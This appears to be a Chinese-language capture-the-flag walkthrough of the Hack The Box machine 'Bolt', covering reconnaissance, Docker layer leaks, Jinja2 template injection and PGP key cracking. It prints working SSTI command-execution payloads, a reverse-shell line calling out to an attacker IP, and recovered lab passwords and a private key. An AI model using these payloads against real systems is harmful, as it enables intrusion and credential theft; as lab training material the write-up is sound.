【HTB系列】Bolt
2022-2-9 22:13:46 Author: mp.weixin.qq.com(查看原文) 阅读量:3 收藏

0x01 信息收集

─# nmap  10.10.11.114  -p- -sC -sV  --min-rate=2000Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 08:34 ESTNmap scan report for 10.10.11.114Host is up (0.31s latency).Not shown: 65532 closed tcp ports (reset)PORT    STATE SERVICE  VERSION22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)|   256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)|_  256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)80/tcp  open  http     nginx 1.18.0 (Ubuntu)|_http-title:     Starter Website -  About |_http-server-header: nginx/1.18.0 (Ubuntu)443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)| http-title: Passbolt | Open source password manager for teams|_Requested resource was /auth/login?redirect=%2F| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU| Not valid before: 2021-02-24T19:11:23|_Not valid after:  2022-02-24T19:11:23|_http-server-header: nginx/1.18.0 (Ubuntu)|_ssl-date: TLS randomness does not represent timeService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 70.73 seconds

访问网站又一个登录口,还可以创建账户。走一个。不行。有报错

打开后发现是几个虚拟机镜像,有一些信息泄露

0x02 漏洞挖掘

# cat repositories                                                         
{"flask-dashboard-adminlte_appseed-app":{"latest":"3350815d3bdf21771408f91da4551ca6f4e82edce74e9352ed75c2e8a5e68162"}}

这里说,最后一个版本是 xxx。进入目录app/base/__pycache__下发现两个pyc文件。反编译后代码如下:

 pip3 install uncompyle6 -i https://pypi.tuna.tsinghua.edu.cn/simple/ 

当作知识点吧。反编译根源码还是差点。下面发现了源码贴了上来

# -*- encoding: utf-8 -*-"""Copyright (c) 2019 - present AppSeed.us"""
from flask import jsonify, render_template, redirect, request, url_forfrom flask_login import ( current_user, login_required, login_user, logout_user)
from app import db, login_managerfrom app.base import blueprintfrom app.base.forms import LoginForm, CreateAccountFormfrom app.base.models import Userfrom hmac import compare_digest as compare_hashimport crypt
@blueprint.route('/')def route_default(): return redirect(url_for('base_blueprint.login'))
## Login & Registration
@blueprint.route('/login', methods=['GET', 'POST'])def login(): login_form = LoginForm(request.form) if 'login' in request.form: # read form data username = request.form['username'] password = request.form['password']
# Locate user user = User.query.filter_by(username=username).first() # Check the password stored_password = user.password stored_password = stored_password.decode('utf-8') if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):
login_user(user) return redirect(url_for('base_blueprint.route_default'))
# Something (user or pass) is not ok return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)
if not current_user.is_authenticated: return render_template( 'accounts/login.html', form=login_form) return redirect(url_for('home_blueprint.index'))
@blueprint.route('/register', methods=['GET', 'POST'])def register(): login_form = LoginForm(request.form) create_account_form = CreateAccountForm(request.form) if 'register' in request.form:
username = request.form['username'] email = request.form['email' ] data = User.query.filter_by(email=email).first() if data is None: # Check usename exists user = User.query.filter_by(username=username).first() if user: return render_template( 'accounts/register.html', msg='Username already registered', success=False, form=create_account_form)
# Check email exists user = User.query.filter_by(email=email).first() if user: return render_template( 'accounts/register.html', msg='Email already registered', success=False, form=create_account_form)
# else we can create the user user = User(**request.form) db.session.add(user) db.session.commit()
return render_template( 'accounts/register.html', msg='User created please <a href="/login">login</a>', success=True, form=create_account_form)
else: return render_template( 'accounts/register.html', form=create_account_form)
@blueprint.route('/logout')def logout(): logout_user() return redirect(url_for('base_blueprint.login'))
## Errors
@login_manager.unauthorized_handlerdef unauthorized_handler(): return render_template('page-403.html'), 403
@blueprint.errorhandler(403)def access_forbidden(error): return render_template('page-403.html'), 403
@blueprint.errorhandler(404)def not_found_error(error): return render_template('page-404.html'), 404
@blueprint.errorhandler(500)def internal_error(error): return render_template('page-500.html'), 500
└─# cat forms.py # uncompyle6 version 3.8.0# Python bytecode 3.6 (3379)# Decompiled from: Python 3.9.7 (default, Sep 24 2021, 09:43:00) # [GCC 10.3.0]# Embedded file name: /app/base/forms.py# Compiled at: 2021-03-05 12:48:36# Size of source mod 2**32: 791 bytes"""Copyright (c) 2019 - present AppSeed.us"""from flask_wtf import FlaskFormfrom wtforms import TextField, PasswordFieldfrom wtforms.validators import InputRequired, Email, DataRequired
class LoginForm(FlaskForm): username = TextField('Username', id='username_login', validators=[DataRequired()]) password = PasswordField('Password', id='pwd_login', validators=[DataRequired()])

class CreateAccountForm(FlaskForm): username = TextField('Username', id='username_create', validators=[DataRequired()]) email = TextField('Email', id='email_create', validators=[DataRequired(), Email()]) password = PasswordField('Password', id='pwd_create', validators=[DataRequired()])# okay decompiling forms.cpython-36.pyc

东西太多, 先看哪些重要的

for i in a:
os.system("tar -tvf"+i)

几个特殊的文件列一下:

a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar-rw-r--r-- root/root     16384 2021-03-05 12:44 db.sqlite3
2265c5097f0b290a53b7556fd5d721ffad8a4921bfc2a6e378c04859185d27fa/layer.tar-rw-r--r-- root/root 791 2021-03-05 12:48 app/base/forms.py-rw-r--r-- root/root 3778 2021-03-05 12:49 app/base/routes.py745959c3a65c3899f9e1a5319ee5500f199e0cadf8d487b92e2f297441f8c5cf/layer.tar-rw-r--r-- root/root 142 2021-03-05 06:11 .env-rw-r--r-- root/root 1448 2021-03-05 09:22 config.py-rw-r--r-- root/root 198 2021-03-05 06:11 gunicorn-cfg.py-rw-r--r-- root/root 116 2021-03-05 07:40 requirements.txt-rw-r--r-- root/root 955 2021-03-05 06:11 run.py

config.py文件中有一个sqllite3连接和postfreSQl数据库的账号密码。

    #PostgreSQL database
   SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(
       config( 'DB_ENGINE'   , default='postgresql'   ),
       config( 'DB_USERNAME' , default='appseed'       ),
       config( 'DB_PASS'     , default='pass'         ),
       config( 'DB_HOST'     , default='localhost'     ),
       config( 'DB_PORT'     , default=5432           ),
       config( 'DB_NAME'     , default='appseed-flask' )
  )

admin   [email protected]  $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.

密码密文。通过接口login可以发现接口是这样加密的

        # read form data        username = request.form['username']        password = request.form['password']
# Locate user user = User.query.filter_by(username=username).first() # Check the password stored_password = user.password stored_password = stored_password.decode('utf-8') if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):
login_user(user) return redirect(url_for('base_blueprint.route_default'))

根据代码逻辑,关键在于使用username 查询后创建了一个user对象。用户登录的条件是用户存在,且用户密码和用户原始密码(用密文当盐)的加密相比的,竟然能等于原来的值。一脸懵逼。解密出如下密码:

admin/deadbolt

到这里感觉没东西了

扫描一下vhost,找到两个子域名 demomail

现在有三个网站了。

demo.bolt.htb#一个登录界面,能够创建用户,需要一个invite code
mail.boot.htb #一个登录界面
passbolt.bolt.htb AdminLTE3

config.py中还配置了一个SECRET_KEY default='S#perS3crEt_007'

尝试一下不行

找了好久找到了

'XNSS-HSJW-3NGU-8XTJ'
curl -i -s -k -X $'POST' \
  -H $'Host: demo.bolt.htb' \
  --data-binary $'\x0d\x0ausername=123&[email protected]&password=123&invite_code=XNSS-HSJW-3NGU-8XTJ' \
  $'http://demo.bolt.htb/register'

注册后发现可以登录mail,mail应该是一个邮件服务器。

邮件服务可以登录,发现修改一下配置,会收到一个邮件???因为是pyhon的尝试模版注入。

点击后,发现一个新的邮件,出现了10000,说明name参数处存在SSTI注入漏洞。

{{"".__class__.__bases__[0].__subclasses__()}}

查看到  popen是223个


{{"".__class__.__bases__[0].__subclasses__()[222]}}
<class 'subprocess.Popen'>

最终调用初始化,发现不行。

{{"".__class__.__bases__[0].__subclasses__()[222].__init__}}
<slot wrapper '__init__' of 'object' objects>

由于使用了模板jinja2,尝试搜了下payload:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen("whoami").read()}}
www-data

0x03 获取权限

同样的方法发送payload:

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1"').read() }}
└─# nc -lvnp 4444listening on [any] 4444 ...connect to [10.10.14.50] from (UNKNOWN) [10.10.11.114] 50808bash: cannot set terminal process group (1012): Inappropriate ioctl for devicebash: no job control in this shellwww-data@bolt:~/demo$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)www-data@bolt:~/demo$ whoamiwhoamiwww-data

0x04 权限提升

www-data@bolt:~/demo$ cat /etc/passwd|grep -v nologin |grep -v falsecat /etc/passwd|grep -v nologin |grep -v falseroot:x:0:0:root:/root:/bin/bashsync:x:4:65534:sync:/bin:/bin/synceddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bashclark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash

www-data ->eddie

[-] /etc/init/ config file permissions:total 24drwxr-xr-x   2 root root  4096 Sep  9 10:07 .drwxr-xr-x 135 root root 12288 Sep 20 15:05 ..-rw-r--r--   1 root root  1757 Nov  6  2019 mysql.conf-rw-r--r--   1 root root   453 Dec  2  2020 whoopsie.conf
[-] Any interesting mail in /var/mail:total 24drwxrwsr-x  3 root     mail 4096 Dec 17 00:27 .drwxr-xr-x 15 root     root 4096 Aug  4 13:06 ..drwx--S---  5     5001 mail 4096 Dec 19 08:23 123-rw-------  1 eddie    mail  909 Feb 25  2021 eddie-rw-------  1 root     mail    1 Mar  3  2021 root-rw-------  1 www-data mail    1 Mar  3  2021 www-data

没找到什么可利用的点。

根据用户查文件:

www-data@bolt:/var/lib/passbolt/tmp$ find /etc -user www-data 2>/dev/nullfind /etc -user www-data 2>/dev/null/etc/passbolt/Seeds
/etc/passbolt/Seeds

passbolt.php 中存在一个passwd: rT2;jW7<eY8!dX8}pQ8%有如下关键信息:

return [    'App' => [        // A base URL to use for absolute links.        // The url where the passbolt instance will be reachable to your end users.        // This information is need to render images in emails for example        'fullBaseUrl' => 'https://passbolt.bolt.htb',    ],
// Database configuration. 'Datasources' => [ 'default' => [ 'host' => 'localhost', 'port' => '3306', 'username' => 'passbolt', 'password' => 'rT2;jW7<eY8!dX8}pQ8%', 'database' => 'passboltdb', ], ],

数据库连接上,没什么关键信息。

select * from users;+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+| id                                   | role_id                              | username       | active | deleted | created             | modified            |+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+| 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | [email protected] |      1 |       0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 || 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 [email protected] |      1 |       0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 |

还有一个奇怪的东西

-----BEGIN PGP MESSAGE-----Version: OpenPGP.js v4.10.9Comment: https://openpgpjs.org
wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5pscg/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kYpCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3HoAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Pxl+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218RzyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQpedLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+ul0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCtoPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tYNdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5aIebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhsnO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984=P38i-----END PGP MESSAGE-----

eddie ->root

OpenPGP是一个加密工具。

比之前多了一个数据库密码。尝试连接切换用户。

其中eddie用户成功。

在邮件中发现有收到来自Clark的用户的邮件,邮件里提到密码管理系统和私钥备份。邮件如下:

eddie@bolt:/var/mail$ cat eddiecat eddieFrom [email protected]  Thu Feb 25 14:20:19 2021Return-Path: <[email protected]>X-Original-To: [email protected]Delivered-To: [email protected]Received: by bolt.htb (Postfix, from userid 1001)        id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)Subject: Important!To: <[email protected]>X-Mailer: mail (GNU Mailutils 3.7)Message-Id: <20210225212019[email protected]>Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)From: Clark Griswold <[email protected]>
Hey Eddie,
The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account.Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...
-Clark

还发现了一个CVE-2021-22555

github搜了一个不行,回头再看。

还有一个信息。

══════════╣ Do I have PGP keys?
/usr/bin/gpg                                                                                                                                        
netpgpkeys Not Found
netpgp Not Found  

什么是PGP???

https://gist.github.com/jhjguxin/6037564

如果不熟悉先在本地测试。


══╣ Possible private SSH keys were found!/etc/ImageMagick-6/mime.xml/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log

在文件中找到三个公钥。,一个私钥,私钥如下

-----BEGIN PGP PRIVATE KEY BLOCK-----Version: OpenPGP.js v4.10.9Comment: https://openpgpjs.org
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cqxZ-----END PGP PRIVATE KEY BLOCK-----

在数据库中还有一个pgp message是需要解密的密文

众所周知,私钥一般有密码,尝试破解私钥的密码

  • 使用gpg2john

└─# gpg2john pri.key > tmp                                                                                                                                                               1 ⨯File pri.key
# cat tmp Eddie Johnson:$gpg$*1*668*2048*2b518595f971db147efe739e2716523786988fb0ee243e5981659a314dfd0779dbba8e14e6649ba4e00cc515b9b4055a9783be133817763e161b9a8d2f2741aba80bceef6024465cba02af3bccd372297a90e078aa95579afbd60b6171cd82fd1b32a9dd016175c088e7bef9b883041eaffe933383434752686688f9d235f1d26c006a698dd6cc132d8acb94c4eceebf010845d69cd9e114873538712f2cd50c8b9ca3bcb9bbc3d83e32564f99031776ac986195e643880483ac80d3f7f1b9143563418ddea7bb71d114c4f24e41134dcdac4662e934d955aeccae92038dbed32f300ac5abed65960e26486c5da59f0d17b71ad9a8fe7a5e6bb77b8c31b68b56e7f4025f01d534be45ab36a7c0818febe23fa577ca346023feefa2bfef0899dd860e05a54d8b3e8bd430f40791a52a20067fde1861d977adf222725658a4661927d65b877cb8ac977601990cfbdb27413f5acc25ff1f691556bc8e5264cffaebbea7e7b9d73de6c719e0a7b004d331eaada86e812e3db60904eaf73a1b79c6e68e74beb6b71f6d644afbf591426418976d68c4e580cbc60b6fdd113f239ae2acd1e1dc51cb74b96b3c2f082bc0214886e1c3cebb3611311d9112d61194df22fb3ceb5783ee7d4a61b544886b389f638fc85d5139f64997014ec38ac59e65b842d92afb50184ccc3549a57dcdb3fc8720cc394912aed931007b53da1c635d302e840da2e6342803831891ab1ccc1669f3cc3240b8d31eded96696d7ad1525c4d277a4d3123abecafdbdde207714539c2e546cd45c4452051394e5d00e711fa5353f817be4fa6827aa0f1428dfb93a918e93975fb4baf3297aa3b7fec33470cf2741237a629b869a762684602057f3e3e6df9c97631caa7589dc4b26653162dfb2f2cf508cbe375496ba735830c2c00f151cdd50c522afe33dbe4265d2*3*254*8*9*16*b81f0847e01fb836c8cc7c8a2af31f19*16777216*34af9ef3956d5ad8:::Eddie Johnson <[email protected]>::pri.key
  • 进行破解

┌──(root💀kali)-[~/tmp]└─# john --wordlist=/usr/share/wordlists/rockyou.txt tmpUsing default input encoding: UTF-8Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])Cost 1 (s2k-count) is 16777216 for all loaded hashesCost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 8 for all loaded hashesCost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashesWill run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusmerrychristmas   (Eddie Johnson)1g 0:00:13:03 DONE (2021-12-20 11:05) 0.001277g/s 54.71p/s 54.71c/s 54.71C/s mhines..menudoUse the "--show" option to display all of the cracked passwords reliablySession completed

解密:

gpg --batch --import /tmp/pri.keygpg --pinentry-mode loopback --passphrase merrychristmas -d /tmp/pub.key
{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}

切换用户到root,成功获取权限。

喜欢就请关注我们吧!


文章来源: https://mp.weixin.qq.com/s?__biz=MzU3MTU3NDk4Mw==&mid=2247485021&idx=1&sn=991b0f92a605120c903342d5c0d2c2d4&chksm=fcdf59f5cba8d0e3f881d60f3f2d026d582e6daf0463a031f572b5c2f801af3c40284ca22df4&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh